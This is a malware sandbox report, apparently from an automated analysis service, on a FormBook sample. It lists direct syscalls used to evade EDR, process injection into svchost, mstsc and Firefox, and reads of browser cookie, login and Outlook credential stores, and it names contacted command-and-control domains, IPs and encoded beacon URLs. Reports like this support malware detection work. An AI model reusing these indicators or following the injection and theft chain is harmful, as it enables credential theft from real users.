            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007C81D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_007C81D4
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0079A2D5
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079A2A4 SetUnhandledExceptionFilter,0_2_0079A2A4

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\rP0n___87004354.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 4956Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\mstsc.exeThread APC queued: target process: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\rP0n___87004354.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 22F0008Jump to behavior
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007C8A73 LogonUserW,0_2_007C8A73
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00773B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00773B4C
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00774A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00774A35
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D4CFA mouse_event,0_2_007D4CFA
            Source: C:\Users\user\Desktop\rP0n___87004354.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rP0n___87004354.exe"Jump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007C81D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_007C81D4
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D4A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_007D4A08
            Source: rP0n___87004354.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: rP0n___87004354.exe, FrywuFHvnDbLo.exe, 00000002.00000002.3547131752.0000000001720000.00000002.00000001.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000000.1729464301.0000000001720000.00000002.00000001.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1883081777.0000000001470000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: FrywuFHvnDbLo.exe, 00000002.00000002.3547131752.0000000001720000.00000002.00000001.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000000.1729464301.0000000001720000.00000002.00000001.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1883081777.0000000001470000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: FrywuFHvnDbLo.exe, 00000002.00000002.3547131752.0000000001720000.00000002.00000001.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000000.1729464301.0000000001720000.00000002.00000001.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1883081777.0000000001470000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: FrywuFHvnDbLo.exe, 00000002.00000002.3547131752.0000000001720000.00000002.00000001.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000000.1729464301.0000000001720000.00000002.00000001.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1883081777.0000000001470000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007987AB cpuid 0_2_007987AB
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007A5007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_007A5007
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007B215F GetUserNameW,0_2_007B215F
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007A40BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_007A40BA
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00774AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00774AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2490000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3547541019.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1817399152.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3546547268.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3547479377.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3547465093.00000000055B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\mstsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: rP0n___87004354.exeBinary or memory string: WIN_81
            Source: rP0n___87004354.exeBinary or memory string: WIN_XP
            Source: rP0n___87004354.exeBinary or memory string: WIN_XPe
            Source: rP0n___87004354.exeBinary or memory string: WIN_VISTA
            Source: rP0n___87004354.exeBinary or memory string: WIN_7
            Source: rP0n___87004354.exeBinary or memory string: WIN_8
            Source: rP0n___87004354.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2490000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3547541019.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1817399152.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3546547268.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3547479377.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3547465093.00000000055B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007E6399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_007E6399
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007E685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_007E685D

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518123 Sample: rP0n___87004354.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 28 www.heldhold.xyz 2->28 30 www.useanecdotenow.tech 2->30 32 16 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 5 other signatures 2->50 10 rP0n___87004354.exe 3 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 FrywuFHvnDbLo.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 mstsc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 FrywuFHvnDbLo.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.heldhold.xyz 67.223.117.189, 49750, 49751, 49752 VIMRO-AS15189US United States 22->34 36 www.mfgarage.net 85.153.138.113, 49766, 49767, 49768 TELECABLESpainES Turkey 22->36 38 6 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            rP0n___87004354.exe74%ReversingLabsWin32.Backdoor.FormBook
            rP0n___87004354.exe100%AviraHEUR/AGEN.1319375
            rP0n___87004354.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.linkwave.cloud/al6z/0%Avira URL Cloudsafe
            http://www.dalong.site/v2c3/0%Avira URL Cloudsafe
            http://www.ultraleap.net/8pln/?PR_xXrA=T9/DtY4QstE2hf5O1waUB+I/eJ4Uv9cvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9oL792aB/FoBSyK+aeSTPR1nXcfMqNX8wInY=&n0=mTk8u4lhzbnhVh0%Avira URL Cloudsafe
            http://www.2bhp.com/a4ar/?n0=mTk8u4lhzbnhVh&PR_xXrA=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ=0%Avira URL Cloudsafe
            http://www.asiapartnars.online/kt2f/?PR_xXrA=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&n0=mTk8u4lhzbnhVh0%Avira URL Cloudsafe
            http://www.63582.photo/5o7d/?PR_xXrA=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&n0=mTk8u4lhzbnhVh0%Avira URL Cloudsafe
            https://www.gandi.net/en/domain0%Avira URL Cloudsafe
            http://www.linkwave.cloud/al6z/?n0=mTk8u4lhzbnhVh&PR_xXrA=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw=0%Avira URL Cloudsafe
            http://www.b5x7vk.agency/zznj/0%Avira URL Cloudsafe
            https://whois.gandi.net/en/results?search=ultraleap.net0%Avira URL Cloudsafe
            http://www.b5x7vk.agency/zznj/?n0=mTk8u4lhzbnhVh&PR_xXrA=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs=0%Avira URL Cloudsafe
            http://www.mfgarage.net/3lu7/0%Avira URL Cloudsafe
            http://www.b5x7vk.agency0%Avira URL Cloudsafe
            http://www.asiapartnars.online/kt2f/0%Avira URL Cloudsafe
            http://www.ultraleap.net/8pln/0%Avira URL Cloudsafe
            http://www.dalong.site/v2c3/?n0=mTk8u4lhzbnhVh&PR_xXrA=4KW7rJi8xQgG5Juif0zvrQruwxJNCZQzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxev+uUFboPihN5w7Wu/KeDCgTl/GYzmTNxclA=0%Avira URL Cloudsafe
            http://www.heldhold.xyz/fava/0%Avira URL Cloudsafe
            http://www.63582.photo/5o7d/0%Avira URL Cloudsafe
            https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3FPR_xXrA%3Dn0%Avira URL Cloudsafe
            http://www.mgeducacaopro.online/xamn/0%Avira URL Cloudsafe
            http://www.heldhold.xyz/fava/?PR_xXrA=GCDZpLqdSYk7fT5CRgwCB4qcStchn8AdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQCgtKpqiTYCqf8kUZvClY0WdZB6RiKYyZbbU=&n0=mTk8u4lhzbnhVh0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            webredir.vip.gandi.net
            		217.70.184.50
            		truetrue
              		unknown
              azkwupgf.as66588.com
              		103.248.137.209
              		truetrue
                		unknown
                dalong.site
                		172.96.187.60
                		truetrue
                  		unknown
                  www.b5x7vk.agency
                  		104.21.11.31
                  		truetrue
                    		unknown
                    www.heldhold.xyz
                    		67.223.117.189
                    		truetrue
                      		unknown
                      www.2bhp.com
                      		81.88.63.46
                      		truetrue
                        		unknown
                        linkwave.cloud
                        		3.33.130.190
                        		truetrue
                          		unknown
                          asiapartnars.online
                          		3.33.130.190
                          		truetrue
                            		unknown
                            mgeducacaopro.online
                            		3.33.130.190
                            		truetrue
                              		unknown
                              www.mfgarage.net
                              		85.153.138.113
                              		truetrue
                                		unknown
                                www.dalong.site
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.useanecdotenow.tech
                                  		unknown
                                  		unknowntrue
                                    		unknown
